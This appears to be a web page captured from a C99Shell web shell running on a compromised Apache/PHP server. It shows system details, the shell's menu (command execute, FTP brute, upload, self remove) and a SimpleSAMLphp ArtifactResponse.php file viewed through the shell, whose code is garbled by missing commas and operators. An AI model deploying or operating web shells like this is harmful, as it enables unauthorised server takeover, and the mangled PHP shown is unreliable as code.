!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/apex_led/php/3ros/simplesamlphp/lib/SAML2/   drwxrwxr-x
Free 13.84 GB of 61.93 GB (22.35%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ArtifactResponse.php (1.37 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * The SAML2_ArtifactResponse, is the response to the SAML2_ArtifactResolve.
 *
 * @author Danny Bollaert, UGent AS. <danny.bollaert@ugent.be>
 * @package simpleSAMLphp
 * @version $Id$
 */
class SAML2_ArtifactResponse extends SAML2_StatusResponse {


    
/**
     * The DOMElement with the message the artifact refers
     * to, or NULL if we don't refer to any artifact.
     *
     * @var DOMElement|NULL
     */
    
private $any;


    public function 
__construct(DOMElement $xml NULL) {
        
parent::__construct('ArtifactResponse'$xml);

        if(!
is_null($xml)){

            
$status SAML2_Utils::xpQuery($xml'./saml_protocol:Status');
            
assert('!empty($status)'); /* Will have failed during StatusResponse parsing. */

            
$status $status[0];

            for (
$any $status->nextSibling$any !== NULL$any $any->nextSibling) {
                if (
$any instanceof DOMElement) {
                    
$this->any $any;
                    break;
                }
                
/* Ignore comments and text nodes. */
            
}
        }

    }


    public function 
setAny(DOMElement $any NULL) {
        
$this->any $any;
    }


    public function 
getAny() {
        return 
$this->any;
    }


    
/**
     * Convert the response message to an XML element.
     *
     * @return DOMElement  This response.
     */
    
public function toUnsignedXML() {

        
$root parent::toUnsignedXML();
        if (isset(
$this->any)) {
            
$node $root->ownerDocument->importNode($this->anyTRUE);
            
$root->appendChild($node);

        }

        return 
$root;
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.4731 ]--